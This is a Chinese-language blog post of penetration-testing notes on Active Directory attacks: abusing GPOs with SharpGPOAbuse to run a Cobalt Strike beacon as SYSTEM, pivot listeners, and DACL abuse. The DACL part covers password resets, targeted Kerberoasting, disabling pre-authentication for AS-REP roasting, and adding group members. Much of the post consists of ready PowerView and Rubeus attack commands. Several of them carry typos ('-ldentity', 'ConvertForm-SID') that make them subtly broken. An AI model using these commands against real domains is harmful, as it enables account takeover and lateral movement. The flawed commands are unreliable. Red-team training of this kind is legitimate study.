GPO与DACL

最新推荐文章于 2024-11-10 15:12:00 发布
最新推荐文章于 2024-11-10 15:12:00 发布
阅读量1.3k 收藏
点赞数
分类专栏: 渗透 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/127298884
版权
组策略对象
组策略是森林或域中控制计算机和用户配置的中央存储库,组策略对象GPO是应用于OU的
配置集。OU中任何计算机或成员都被GPO所影响。
默认情况下,只有域管理员可以创建GPO并将GPO链接到OU,但通常的做法是将这些权限
委派给其他团队,例如委派工作站管理员创建GPO并将其链接到工作站OU的权限。
当一组用户有权限修改应用高特权用户GPO时,或被特权用户使用的计算机,往往容易导致
特权提升,GPO也可被利用与横向移动并创建持久化后门。
跳板监听器
实际上,存在另一种P2P监听器,跳板监听器与TCP监听器的工作原理相反,当生成一个
TCP监听器的Beacon,Beacon作为TCP服务器并且等待连接进来的现存Beacon,即
TCP客户端。
跳板监听器并不在监听菜单中创建,而是绑定在个人Beacon,现存的Beacon会绑定一个端口
并且监听前来的连接,即作为TCP服务器,而使用了跳板监听器的Beacon载荷则是客户端。
创建:
右键Beacon->Pivoting->Listener
RSAT
RSAT是微软提供的用于协助管理域内组件的管理组件,由于它是合法的工具且经常在工作站
与服务器上使用,所以我们可以利用它而不需要携带外部工具。	
GroupPolicy模块有数个powershell命令可以用于管理GPO,包括
new-gpo:创建一个新的空GPO
new-gplink:将一个GPO连接到站点、域、或OU
set-gpprefregistryvalue:在计算机或用户配置下配置下一个注册表偏好条目。
SHarpGPOAbuse
SharpGPOAbuse工具(https://github.com/FSecureLABS/SharpGPOAbuse)可被用于进行一系列
对GPO的利用,它不能创建新的GPO,因此在这里我们需要用RSAT等工具创建目标GPO或者对我们
具有写权限的GPO进行利用。
使用SharpGPOAbuse给目标GPO添加立即计划任务
execute-assembly SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" -- Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c\\dc-2\c$\users\beacon.exe" --GPOName "PowerShell Logging"
DACL
在域内,也许会有一些主体对于其他更高特权的账号具有ACLs,这会导致账号接管,比如support组可以修改域管理员密码。
枚举作用于某个账号所有DACL
Get-ObjectAcl -ldentity bfarmer -ResolveGUIDs | Foreach-Object{$_| Add-Member -NotePropertyName ldentity -NotePropertyValue [ConvertForm-SID $_.Securityldentifier.vale] - Force;$_}
可以枚举当前用户具有权限的用户,可以在Boolhound中更直观的观察DACL。
重置用户密码
当用户A可以重置用户B密码时
net user jadams Password /domain
PowerView中
Set-DomainUserPassword -identity jadams -AccountPassword [ConverTo-SecureString 'Password' -AsPlainText -Force]-Verbose
OPSEC:这是个很不好的OPSEC
设置SPN
GenericWrite权限也可以用此方法进行利用
我们还可以给用户设置SPN并进行Kerberoasting攻击,之后离线破解Krb5TGS哈希
PowerView中
Set-DomainObject -ldentity jadams -Set @{serviceprincipalname="srv-1/evli"}
execute-assembly rubeus.exe kerberoast /user:jadams /format:hashcat /nowrap
Set-DomainObject -ldentity jadams -Clear ServicePrincpalName
禁用预认证
类似于刚才的思想,我们可以进制用户账号的预认证然后对其进行ASREPRoasting攻击
我们需要修改目标用户账号的UAC值以禁用预认证
Get-NetUser -ldentity jadams | ConvertFrom-UACValue
Set-DomainObject -ldntity jadams -XOR@{UserAccountControl=4194304}
Get-NetUser -ldentity jadams | ConvertFrom-UACValue
execute-assembly rubeus.exe asreproast /user:jadams /format:hashcat /nowrap
修改组成员
如果我们对一个组具有ACL,我们可以添加或删除组成员
net group “Oracle Admin”bfarmer /add /domain
还有其他有意思的的DACL可能导致类似的利用,例如我们可以利用WriteDacl从而将
GenericAll权限授予任何主体。我们还可以利用WriteOwner从而将对象的所有权更改为
任何主体,然后该主体将在其上继承GenericAll。
总结
1.跳板监听器使用
2.GPO利用
3.DACL的枚举
4.常见DACL的利用
虚构之人
关注
专栏目录
从Github一开源项目ADSEC【学习域渗透攻防基础】
HBohan的博客
07-30 2123
学习的开源项目是: https://github.com/cfalta/adsec 有些地方是直接Google 翻译过来的。 注意:本人域渗透新手,很多问题都不懂,有问题欢迎大哥后台留言啊!!! Lab Setup – 域环境搭建 学习的过程中,最难的就是环境搭建了。(因为有些坑,别人不一定遇到,么有地方可以问,然后有些问题就离谱。。) 物理机:MacBookPro 2020 Intel i5 虚拟机:Vmware Fusion Windows Server 2019 * 3 域成员用户密码:P@.
2019年度优秀安全内容合集
热门推荐
anquanzushiye的博客
01-06 3万+
2019信息源与信息类型占比微信公众号推荐昵称_英语weixin_no标题网址安全祖师爷PowerShell渗透–帝国https://mp.weixin.qq.com/s/giBR-rn...
组策略(GPO)横向移动
qq_18811919的博客
03-30 499
本篇讲解了如何使用GPO组策略下发CS控制全域机器以及单个机器的控制上线,在大型网络中通过GPO上线全部机器的情况是比较少的因为如果机器太多会导致CS卡顿因此非特殊情况不会上线全部机器,只会上线单个机器。
探索 SharpGPOAbuse:利用组策略对象安全漏洞的利器
gitblog_00084的博客
05-16 375
探索 SharpGPOAbuse:利用组策略对象安全漏洞的利器 去发现同类优质开源项目:https://gitcode.com/ 在网络安全的世界里,发现并利用潜在的安全漏洞是至关重要的。今天,我们向您推荐一个名为 SharpGPOAbuse 的强大工具,这是一个由 MWR InfoSecurity Labs 创建的 .NET 应用程序,旨在帮助安全研究人员和管理员识别并模拟利用 Group Po...
pyGPOAbuse:SharpGPOAbuse的部分python实现
04-15
pyGPOA滥用 描述 对的Python部分实现 当受控帐户可以修改适用于一个或多个用户和计算机的现有GPO时,可以使用此工具。 对于计算机GPO,它将作为远程计算机上的SYSTEM创建即时计划任务,对于用户GPO,将作为登录用户创建立即计划任务。 默认行为将添加本地管理员。 如何使用 基本用法 将john用户添加到本地管理员组(密码: H4x00r123 .. ) ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id " 12345677-ABCD-9876-ABCD-123456789012 " 进阶用法 反向壳示例 ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id " 12345677-ABCD-9876-ABCD-123456789012 " \ -powershell \
组策略(GPO)利用与横向移动
蚁景网安学院
12-21 1383
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客极客技术、信息安全热点安全研究分析等安全相关的技术文章稿件通过并发布还能收获200-800元不等的稿酬组策略...
GPO备份还原复制及导入
weixin_33733810的博客
04-17 1172
GPO 备份、还原、复制以及导入备份 GPOGPO 备份操作将 GPO 中的数据复制到文件系统中。备份功能还具有 GPO 导出功能。可使用 GPO 备份将 GPO 还原到已备份状态,或者将备份中的设置导入到另一个 GPO 中。GPO 备份操作将 GPO 内部存储的所有信息保存到文件系统中。其中包括以下内容:• GPO 全局唯一标识符 (GUID) 和域 GPO 设置• GPO...
13、域渗透提权分析工具 BloodHound 1.3 中的ACL攻击路径介绍
Fly_鹏程万里
06-14 930
导语:当我们在谈论基于ACL的攻击时,我们特指的是访问控制条目(ACE),它填充了自由访问控制列表(DACL)。访问控制条目描述了Active Directory中针对安全对象的其他主体的允许和拒绝的权限。简介和背景2014年,Emmanuel Gras和Lucas Bouillot在“ 信息通信技术研讨会”(Symposium on Information and Communications)...
组策略
weixin_33862993的博客
03-08 106
6.1.1 管理和设置组策略的工具 6.1.2 组策略可以执行的操作 6.1.3 组策略对象 GPOGPO ...
Windows Server 2003 AD部署与管理:域、GPO与活动目录详解
这些属性是动态的,可被更新,并受到DACL(Discretionary Access Control List,自定义访问控制列表)的保护,确保数据的安全性和完整性。 在AD的设计中,域和工作组是两个基本概念。域是一个由管理员组织的计算机...
第10章 - 组策略1
08-03
1. **组策略对象和管理单元**:GPO与管理单元的关系类似于文档和相关编辑器。GPO可以通过独立工具或AD管理单元创建,但只能以可编辑模式打开。 2. **GPO链接**:GPO可链接到特定的AD对象,客户端根据活动目录层次...
深信服AD设备基础知识PPT
07-18
2. 组策略管理:通过组策略对象(GPO)来统一配置用户和计算机的系统设置,如桌面背景、开机启动项、软件安装等,提高运维效率。 3. 访问控制:利用NTFS和DACL(Discretionary Access Control List)设置文件和目录...
Windows服务器安全策略与权限管理
1.1 Windows服务器的重要性与安全挑战 在当今数字化时代,Windows服务器扮演着企业信息系统的重要角色,承担着存储、处理和提供数据服务的功能。然而,随着网络攻击技术的不断演进,Windows服务器面临着各种安全...
【Win32file库的权限提升与访问控制】:系统安全的最佳实践
[【Win32file库的权限提升与访问控制】:系统安全的最佳实践](https://opengraph.githubassets.com/9114181b29d927463ee81c0c702b3c5a2cc7810347f0ffebf537337fda0c3df5/shubham0d/UAC-bypass-using-dll-injection) ...
网络安全从零开始学习CTF——CTF基本概念
Hacker_Oldv的博客
11-09 1684
不要太深入,差不多就可以了,对照文档就可以写出程序就差不多了且能看得懂就好了,因为每个语言都是学不完的,一直在更新,如果过分专注于一个语言,安全知识就挺容易漏下的。上面都是个人想法,怎么选都要靠自己决定,要不要深入、深入哪一门都是问题,一定要考虑清楚再下手,别等下学了一半就改变方向,这是学习的大忌,因为你学其它的也会这样,除非是你发现这个不是很适合你的发展。其中,一血、二血、三血拿的分数比较高,后面答该题的队伍拿的分数就一样了,答题的队伍越少,分数就越多,然后按分数排名,确定进入决赛的队伍。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 566
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 1423
信息安全工程师——操作系统安全概述篇
电子电气架构--- 实施基于以太网的安全车载网络
最新发布
Soly_kun的博客
11-10 742
电子电气架构--- 实施基于以太网的安全车载网络
【 AI写作鹅-注册安全分析报告-无验证方式导致安全隐患】
11-08 1225
合肥名阳信息技术有限公司成立于2016年,是一家专门从事移动互联网应用研发和运营的国家高新技术企业。公司坚持以用户为中心,打造富有吸引力的产品,满足移动互联网用户各项需求。公司产品涵盖:AI配音、AI写作、AiPPT、同声传译、文生视频,AI绘画、各种工具类应用,为消费者提供完善的办公、多媒体等领域的解决方案,秉承着专业、服务、高效、客户至上的原则,多年来致力于为用户提供服务新体验。
gpo install software
02-24
gpo install software 是一种在 Windows 操作系统中使用组策略对象(Group Policy Object,GPO)来安装软件的方法。GPO 是一种用于管理计算机和用户配置的集中式管理工具,它可以通过网络将配置应用于多台计算机。 要使用 gpo install software 安装软件,首先需要创建一个 GPO,并将其链接到目标计算机或用户所在的组织单位(OU)。然后,在 GPO 中配置软件安装设置,指定要安装的软件包的位置和其他相关设置。最后,将 GPO 应用到目标计算机或用户上,GPO 将自动安装指定的软件包。 使用 gpo install software 的好处是可以实现集中管理和自动化安装,减少了手动在每台计算机上安装软件的工作量。此外,通过 GPO 还可以实现软件的升级、卸载和配置修改等操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值